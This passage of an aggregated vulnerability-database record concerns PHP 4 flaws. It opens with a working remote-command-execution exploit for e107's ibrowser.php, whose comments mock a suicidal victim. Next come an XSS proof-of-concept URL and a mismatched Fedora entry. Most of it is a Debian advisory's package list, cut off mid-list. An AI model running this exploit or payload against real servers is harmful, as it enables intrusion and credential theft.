\"\\r\\n\".$html;\r\n}\r\n\r\n$host=$argv[1];\r\n$path=$argv[2];\r\n$cmd=\"\";\r\n$port=80;\r\n$proxy=\"\";\r\nfor ($i=3; $i<$argc; $i++){\r\n$temp=$argv[$i][0].$argv[$i][1];\r\nif (($temp<>\"-p\") and ($temp<>\"-P\")) {$cmd.=\" \".$argv[$i];}\r\nif ($temp==\"-p\")\r\n{\r\n $port=str_replace(\"-p\",\"\",$argv[$i]);\r\n}\r\nif ($temp==\"-P\")\r\n{\r\n $proxy=str_replace(\"-P\",\"\",$argv[$i]);\r\n}\r\n}\r\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}\r\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\r\n\r\n$data=\"-----------------------------7d529a1d23092a\\r\\n\"; #oh, I want to tell you a story, about a Telecom guy *\r\n$data.=\"Content-Disposition: form-data; name=\\\"tinyMCE_imglib_include\\\"; filename=\\\"suntzu\\\";\\r\\n\"; #that doesn't know *\r\n$data.=\"Content-Type: image/jpeg;\\r\\n\\r\\n\"; #the sovereign art of PHP kung-fu, now is desperate and he's seriously *\r\n$data.=\"<?php error_reporting(0);set_time_limit(0);echo 'my_delim';passthru('\".$cmd.\"');echo 'my_delim'; die;?>\\r\\n\";# *\r\n$data.=\"-----------------------------7d529a1d23092a\\r\\n\"; #thinking to kill himself, after he loosed his work *\r\n$data.=\"Content-Disposition: form-data; name=\\\"-1203709508\\\"; filename=\\\"suntzu\\\";\\r\\n\";//and his honour and self-respect*\r\n$data.=\"Content-Type: image/jpeg;\\r\\n\\r\\n\"; //because of some brave guys that rooted his boxes.*\r\n$data.=\"1\\r\\n\";# *\r\n$data.=\"-----------------------------7d529a1d23092a\\r\\n\"; #Now, guy, don't cry anymore, but... do something *\r\n$data.=\"Content-Disposition: form-data; name=\\\"225672436\\\"; filename=\\\"suntzu\\\";\\r\\n\"; #useful, please open the PHP *\r\n$data.=\"Content-Type: image/jpeg;\\r\\n\\r\\n\"; #manual, like a respectful student. And start to... *\r\n$data.=\"1\\r\\n\";# *\r\n$data.=\"-----------------------------7d529a1d23092a\\r\\n\";# *\r\n$data.=\"Content-Disposition: form-data; name=\\\"GLOBALS\\\"; filename=\\\"suntzu\\\";\\r\\n\";# *\r\n$data.=\"Content-Type: image/jpeg;\\r\\n\\r\\n\";# *\r\n$data.=\"1\\r\\n\";# *\r\n$data.=\"-----------------------------7d529a1d23092a--\\r\\n\";# *\r\n$packet =\"POST \".$p.\"e107_handlers/tiny_mce/plugins/ibrowser/ibrowser.php HTTP/1.0\\r\\n\";# *\r\n$packet.=\"Host: \".$host.\"\\r\\n\";# *\r\n$packet.=\"Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\\r\\n\";# *\r\n$packet.=\"Content-Length: \".strlen($data).\"\\r\\n\";# *\r\n$packet.=\"Accept: text/plain\\r\\n\";# *\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";# *\r\n$packet.=$data;# *\r\nsendpacketii($packet);# *\r\nif (strstr($html,\"my_delim\")){# *\r\necho \"exploit succeeded...\\n\";$temp=explode(\"my_delim\",$html);die($temp[1]); #...pray *\r\n}\r\necho \"exploit failed... register_globals=off here or wrong PHP version\\n\";\r\n?>", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/26443/"}, {"lastseen": "2016-02-03T03:36:41", "description": "PHP 4.x PHPInfo Cross-Site Scripting Vulnerability. CVE-2005-3388 . Webapps exploit for php platform", "published": "2005-10-31T00:00:00", "type": "exploitdb", "title": "PHP 4.x PHPInfo Cross-Site Scripting Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-3388"], "modified": "2005-10-31T00:00:00", "id": "EDB-ID:26442", "href": "https://www.exploit-db.com/exploits/26442/", "sourceData": "source: http://www.securityfocus.com/bid/15248/info\r\n\r\nPHP is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.\r\n\r\nAn attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. \r\n\r\nhttp://www.example.com/phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script> ", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/26442/"}], "fedora": [{"lastseen": "2020-12-21T08:17:56", "bulletinFamily": "unix", "cvelist": ["CVE-2005-3388"], "description": "This package contains the set of CA certificates chosen by the Mozilla Foundation for use with the Internet PKI. ", "modified": "2020-06-23T01:23:25", "published": "2020-06-23T01:23:25", "id": "FEDORA:87D4330CDA96", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: ca-certificates-2020.2.41-1.1.fc32", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "debian": [{"lastseen": "2020-11-11T13:13:06", "bulletinFamily": "unix", "cvelist": ["CVE-2005-3353", "CVE-2006-3017", "CVE-2006-4482", "CVE-2006-5465"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1206-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nNovember 6th, 2006 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : php4\nVulnerability : several\nProblem-Type : remote\nDebian-specific: no\nCVE ID : CVE-2005-3353 CVE-2006-3017 CVE-2006-4482 CVE-2006-5465\n\nSeveral remote vulnerabilities have been discovered in PHP, a\nserver-side, HTML-embedded scripting language, which may lead to the\nexecution of arbitrary code. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\nCVE-2005-3353\n\n Tim Starling discovered that missing input sanitising in the EXIF\n module could lead to denial of service.\n\nCVE-2006-3017\n\n Stefan Esser discovered a security-critical programming error in the\n hashtable implementation of the internal Zend engine.\n\nCVE-2006-4482\n\n It was discovered that str_repeat() and wordwrap() functions perform\n insufficient checks for buffer boundaries on 64 bit systems, which\n might lead to the execution of arbitrary code.\n\nCVE-2006-5465\n\n Stefan Esser discovered a buffer overflow in the htmlspecialchars()\n and htmlentities(), which might lead to the execution of arbitrary\n code.\n\nFor the stable distribution (sarge) these problems have been fixed in\nversion 4:4.3.10-18. Builds for hppa and m68k will be provided later\nonce they are available.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 4:4.4.4-4 of php4 and version 5.1.6-6 of php5.\n\nWe recommend that you upgrade your php4 packages.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/p/php4/php4_4.3.10-18.dsc\n Size/MD5 checksum: 1686 b99c2dd2804c2bbc49e2ddf4552cc80c\n http://security.debian.org/pool/updates/main/p/php4/php4_4.3.10-18.diff.gz\n Size/MD5 checksum: 280816 86bdd61412df9ca0b87a5f5aa536a610\n http://security.debian.org/pool/updates/main/p/php4/php4_4.3.10.orig.tar.gz\n Size/MD5 checksum: 4892209 73f5d1f42e34efa534a09c6091b5a21e\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/p/php4/php4-pear_4.3.10-18_all.deb\n Size/MD5 checksum: 250000 8d364cb47cfbb8bb2472ca47812123e3\n http://security.debian.org/pool/updates/main/p/php4/php4_4.3.10-18_all.deb\n Size/MD5 checksum: 1144 26260bbbf8804b071cdf75ce70bde876\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-18_alpha.deb\n Size/MD5 checksum: 1700934 1deff9409b11b01a88a805ca8726d3c3\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-18_alpha.deb\n Size/MD5 checksum: 1698672 d91afe4bf274a9abc1227747765be8ca\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-18_alpha.deb\n Size/MD5 checksum: 3464908 2d3ac8b65a2650bbc60327043bb74cfa\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-18_alpha.deb\n Size/MD5 checksum: 1743098 0228c6cb6f305f473d0df08c61bfe10f\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-18_alpha.deb\n Size/MD5 checksum: 167916 02f6e85f6e12684c41f16cf908aa2a0e\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-18_alpha.deb\n Size/MD5 checksum: 18148 3aa1ca7f556608a37d8dc6442cbc244e\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-18_alpha.deb\n Size/MD5 checksum: 325200 7126e4aa1ca42fd6e04a72ba782dc2e0\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-18_alpha.deb\n Size/MD5 checksum: 39036 28fc28ae9bf2b4ab091b7ae6687b027d\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-18_alpha.deb\n Size/MD5 checksum: 34552 daa6539117567a4fffd1c8196426b3d7\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-18_alpha.deb\n Size/MD5 checksum: 38060 026c1fdd47d1cc9ff426427d5e04e5c6\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-18_alpha.deb\n Size/MD5 checksum: 21378 01d0e1b4abc53a4aff236bae15a3021c\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-18_alpha.deb\n Size/MD5 checksum: 18210 ebb9a131438cd54cd636fab7db1b3293\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-18_alpha.deb\n Size/MD5 checksum: 8340 29dda4814444739effce591f24f4b3da\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-18_alpha.deb\n Size/MD5 checksum: 22454 344307b6d30996a6fc9bcffab5ea163d\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-18_alpha.deb\n Size/MD5 checksum: 28368 114065def6bdf90c16fc60e8c087dfec\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-18_alpha.deb\n Size/MD5 checksum: 7964 4b614f3bfa16346d449bcbee71c58d75\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-18_alpha.deb\n Size/MD5 checksum: 13770 6f8c4f516e744ed9daf4157df9112fa6\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-18_alpha.deb\n Size/MD5 checksum: 23304 644e7764688b5d9305cf9bb625ae6747\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-18_alpha.deb\n Size/MD5 checksum: 17886 a01178a81b43e0fd909a16a81695832b\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-18_amd64.deb\n Size/MD5 checksum: 1660608 2dcf0c9a7c99609665f54d571628bc4f\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-18_amd64.deb\n Size/MD5 checksum: 1658062 009757f161f1ff3bd3fc29bee44d6e17\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-18_amd64.deb\n Size/MD5 checksum: 3277740 76ee9926ad67aa6dd666edb59a590adf\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-18_amd64.deb\n Size/MD5 checksum: 1648188 3b40796e964ee6eab1e06a1a76029ef1\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-18_amd64.deb\n Size/MD5 checksum: 167920 0064aba32b455b870848cf0c151ed93f\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-18_amd64.deb\n Size/MD5 checksum: 17834 d44cba2553a65d00f844d964615c2f0c\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-18_amd64.deb\n Size/MD5 checksum: 325184 f21e0e6afe5835083193c3039ab5fdfc\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-18_amd64.deb\n Size/MD5 checksum: 40802 9ccd024e9fb5f70aa3ecc3d4c0fe8531\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-18_amd64.deb\n Size/MD5 checksum: 34286 781c66281eb08f129aae64d806cb42b1\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-18_amd64.deb\n Size/MD5 checksum: 37650 a0c129d1e47883a244199e553c637581\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-18_amd64.deb\n Size/MD5 checksum: 21412 7de677bfdae7ac19f663f878a00dcb40\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-18_amd64.deb\n Size/MD5 checksum: 18884 bb82e2d09986e4f76e64b05d27f26dd5\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-18_amd64.deb\n Size/MD5 checksum: 8244 1ede17004a053a4d66f541e580fcf56d\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-18_amd64.deb\n Size/MD5 checksum: 22890 83c5c86e1c9e4260cdf68048b8a4052b\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-18_amd64.deb\n Size/MD5 checksum: 28784 c717f11defbfd27a151035510efae669\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-18_amd64.deb\n Size/MD5 checksum: 7908 9a89b18ed52654643c368b8374494940\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-18_amd64.deb\n Size/MD5 checksum: 13672 aadb8c935c6cfc0940ebca26f74a8f66\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-18_amd64.deb\n Size/MD5 checksum: 22434 904489e90619114f29a371c175b81e7d\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-18_amd64.deb\n Size/MD5 checksum: 17570 08b245b8e01cb69806b8e453a7ec6234\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-18_arm.deb\n Size/MD5 checksum: 1591974 afdd3c988badd5c2751e364f77987dbb\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-18_arm.deb\n Size/MD5 checksum: 1591786 a2ea48b3394a081b42eb5f680f29ef72\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-18_arm.deb\n Size/MD5 checksum: 3171516 07df6b074d821e4a61396964050ded20\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-18_arm.deb\n Size/MD5 checksum: 1593088 0703edb2b7348ebf2a4d072e1b52b3bc\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-18_arm.deb\n Size/MD5 checksum: 167938 0934b0061b9aa706a2e33a47d270508a\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-18_arm.deb\n Size/MD5 checksum: 17646 adba08080702e089bffba483a9de1035\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-18_arm.deb\n Size/MD5 checksum: 325468 10b04c3f5e58e3c0a8ca1122f7afb518\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-18_arm.deb\n Size/MD5 checksum: 36114 474494efb516b9cbc403e809df4e419c\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-18_arm.deb\n Size/MD5 checksum: 31782 2f3485924aabf2da12ff9a6c15826abb\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-18_arm.deb\n Size/MD5 checksum: 35384 d4c458352a00c5c2b93c0ea7db3c47fa\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-18_arm.deb\n Size/MD5 checksum: 19736 64ecf4479384d29a420873bcd3f89a65\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-18_arm.deb\n Size/MD5 checksum: 17086 8a5ee897db51d1ef44613dad242b51ea\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-18_arm.deb\n Size/MD5 checksum: 7814 fe2c30426aaaffe72d8ca0151702bc96\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-18_arm.deb\n Size/MD5 checksum: 20598 88b93b4216656b50fc52b2022f7d1d3a\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-18_arm.deb\n Size/MD5 checksum: 27324 e0498ee38ead720b3c8592a1bdc41224\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-18_arm.deb\n Size/MD5 checksum: 7640 52bdb48050f3b8c2d569bbfca236d0ea\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-18_arm.deb\n Size/MD5 checksum: 12794 c9642636475261fe406ffcc81ed9be4e\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-18_arm.deb\n Size/MD5 checksum: 20888 8742826563b883e2e761afc44788c027\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-18_arm.deb\n Size/MD5 checksum: 15792 79495683d81c4cb9063b5c13b94c4547\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-18_i386.deb\n Size/MD5 checksum: 1614232 572e82d2d3c8e9299fc27fb3da1be573\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-18_i386.deb\n Size/MD5 checksum: 1611996 3eb79568d85b2154e07fbc7c8a71ab99\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-18_i386.deb\n Size/MD5 checksum: 3208898 822b7d30ae417ca4cca7a959d33967c0\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-18_i386.deb\n Size/MD5 checksum: 1609468 354276638d467776e026a9b95a1acb60\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-18_i386.deb\n Size/MD5 checksum: 167936 cf408f6af1e686a1b9a9a33e59341bb5\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-18_i386.deb\n Size/MD5 checksum: 17902 3a863a5c7f7540aa01e53ff817affeca\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-18_i386.deb\n Size/MD5 checksum: 325168 3cccbdc82dd6ef063746c691cb5d063f\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-18_i386.deb\n Size/MD5 checksum: 37234 0fbaff4f5b3bcc2ff27ea25ef377f7d8\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-18_i386.deb\n Size/MD5 checksum: 32390 a5110ec9f8e82505613bceb78341a829\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-18_i386.deb\n Size/MD5 checksum: 37370 fd429c6203e71101cd628e4ac040087b\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-18_i386.deb\n Size/MD5 checksum: 19960 8384a96bc96147a83ad05a5ec5f2cfd3\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-18_i386.deb\n Size/MD5 checksum: 17676 90a2ffebe127c8c672b2f43cc9fddfcf\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-18_i386.deb\n Size/MD5 checksum: 8040 e7ee51f0cd7fcb8a66c29a58837509df\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-18_i386.deb\n Size/MD5 checksum: 21218 00f174cd3965a23abcccccc3bcfa2200\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-18_i386.deb\n Size/MD5 checksum: 27146 e84270ecde6cae6a3b4bbdd36bb86c3d\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-18_i386.deb\n Size/MD5 checksum: 7700 a58a6b0579b26459afb478462ee31519\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-18_i386.deb\n Size/MD5 checksum: 13158 a508e1dc78f5fda5c3dd2ad19360fe0d\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-18_i386.deb\n Size/MD5 checksum: 21376 ec7bd84b0e3b1d1cc17355c474486cbb\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-18_i386.deb\n Size/MD5 checksum: 16396 c141d3d2498cc3391f32232b95cb196a\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-18_ia64.deb\n Size/MD5 checksum: 1952128 ced874b90ed36a7843a56303a8a04522\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-18_ia64.deb\n Size/MD5 checksum: 1949382 4cc9f82fe65d380bab127178b3b5f08c\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-18_ia64.deb\n Size/MD5 checksum: 3895128 43c19f3ab0f53e5371595520b2f7d1e7\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-18_ia64.deb\n Size/MD5 checksum: 1949590 cc7d7eff9e324c31ebec2112345821ef\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-18_ia64.deb\n Size/MD5 checksum: 167916 d17b9aa8fc429e41ad6b7393977af93a\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-18_ia64.deb\n Size/MD5 checksum: 22022 ae3a31d8f477eb69650c9d88f7271788\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-18_ia64.deb\n Size/MD5 checksum: 325196 4d7e3dd0d060056bc20198f3d5ead646\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-18_ia64.deb\n Size/MD5 checksum: 50632 7368a6ef6bd8e41bf7a3e905a448660c\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-18_ia64.deb\n Size/MD5 checksum: 45248 0b2cc6364099fe906820c8043f565629\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-18_ia64.deb\n Size/MD5 checksum: 48216 44a538ecbe3760c449e6898fcd9f02a8\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-18_ia64.deb\n Size/MD5 checksum: 27026 8ea2a8c41ce29715747457503714a76b\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-18_ia64.deb\n Size/MD5 checksum: 22648 e6edbf30d910de441c2e080695612a71\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-18_ia64.deb\n Size/MD5 checksum: 9324 2d056ffa84d4d37195cc38c395e4ddec\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-18_ia64.deb\n Size/MD5 checksum: 27598 4e228c68bd22099f414cfc34794a422e\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-18_ia64.deb\n Size/MD5 checksum: 36170 8d23bb4db75de14272daa22e543a8adc\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-18_ia64.deb\n Size/MD5 checksum: 9004 345581f1565d77212bff7dec007322a1\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-18_ia64.deb\n Size/MD5 checksum: 16328 5e96eab77cd21d2ad0074c791429488e\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-18_ia64.deb\n Size/MD5 checksum: 28870 fe208dfb33c64c60888da4ae676eca01\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-18_ia64.deb\n Size/MD5 checksum: 21896 0ae7872423bcddb068506be60a592e02\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-18_mips.deb\n Size/MD5 checksum: 1648412 b22897e5386936f5e0c3e534d0ef4edc\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-18_mips.deb\n Size/MD5 checksum: 1646484 bde0d663e4b088ca096707dbd5ea085e\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-18_mips.deb\n Size/MD5 checksum: 3295390 e7ba986c31963686d61cb4e6e7ab0fb1\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-18_mips.deb\n Size/MD5 checksum: 1652314 7b1146db3f44d0756ab8ba581d91204a\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-18_mips.deb\n Size/MD5 checksum: 167932 f0f0d7221606384be034a43584f6c130\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-18_mips.deb\n Size/MD5 checksum: 16826 26ea16ea5120b002899cb096fb339e04\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-18_mips.deb\n Size/MD5 checksum: 325300 4e7913d8409c58e8d440e222d9bbbaeb\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-18_mips.deb\n Size/MD5 checksum: 35224 c35ca59240f075ee1ad544771e82f52d\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-18_mips.deb\n Size/MD5 checksum: 31930 94ef5618ceaed84a592d5323f25b503c\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-18_mips.deb\n Size/MD5 checksum: 33966 1e3af07adb4c1d335115fadca331a3a9\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-18_mips.deb\n Size/MD5 checksum: 19920 2446320de817c5de6df458cd04b84458\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-18_mips.deb\n Size/MD5 checksum: 16478 daf3946631fc385d2ae3200a84a9e6a7\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-18_mips.deb\n Size/MD5 checksum: 8116 9c12d49a7546cb73d12ce943a0c62ab9\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-18_mips.deb\n Size/MD5 checksum: 20510 c65e0863274f9e341f5085c3cf693ea2\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-18_mips.deb\n Size/MD5 checksum: 26372 f631fadcf8aaf2cde32cc9f34cf9ef62\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-18_mips.deb\n Size/MD5 checksum: 7824 8deeeadd18e998e42dcd4c57fb86db7b\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-18_mips.deb\n Size/MD5 checksum: 13152 9449dc1c15a0b9771b08edb99ac7817c\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-18_mips.deb\n Size/MD5 checksum: 21652 2135a7a2354a4d6009105258cd2cb833\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-18_mips.deb\n Size/MD5 checksum: 16192 6747f81d0d4ccbd501053f68da3ac259\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-18_mipsel.deb\n Size/MD5 checksum: 1630250 9a406a4362e3a8bce8ab0893f1b3fc1e\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-18_mipsel.deb\n Size/MD5 checksum: 1628592 8ff9ec915fd228bab715b4126f0624f8\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-18_mipsel.deb\n Size/MD5 checksum: 3253842 d9101ff31106d55f1361a1aea4da796e\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-18_mipsel.deb\n Size/MD5 checksum: 1631568 92d31cf18ff2138026e9412d5a8c1df6\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-18_mipsel.deb\n Size/MD5 checksum: 167940 46e1e1fed86610fc6a01580eb305e9da\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-18_mipsel.deb\n Size/MD5 checksum: 16794 508b3379bef4e8d7ce31dfc235a11702\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-18_mipsel.deb\n Size/MD5 checksum: 325300 aebcf44cf3ec1a9f5d57254d58240a2f\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-18_mipsel.deb\n Size/MD5 checksum: 34776 bcb4cd6a3606ee5a069328928a466b1b\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-18_mipsel.deb\n Size/MD5 checksum: 31662 5b371eb869cab39bc263dec252b24d46\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-18_mipsel.deb\n Size/MD5 checksum: 33836 79365af49433d2a52fa84eb83e13ff18\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-18_mipsel.deb\n Size/MD5 checksum: 19802 c7271c289d897c487b9ad2b9d3c8c848\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-18_mipsel.deb\n Size/MD5 checksum: 16388 ab9a58b595aa4da0edb92d8907b3abd4\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-18_mipsel.deb\n Size/MD5 checksum: 8088 af3bb195ba0f355539c95e512dacaa1b\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-18_mipsel.deb\n Size/MD5 checksum: 20452 f59bc05f9fe9806a5e96245629444ae8\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-18_mipsel.deb\n Size/MD5 checksum: 26242 495d0af0489ef27a27fb803df9c22f9c\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-18_mipsel.deb\n Size/MD5 checksum: 7772 c0e91e320dc7aa8612cb7ffcf67ff6f4\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-18_mipsel.deb\n Size/MD5 checksum: 13056 9c12b7d4dc873e79ee0367b2f127974a\n 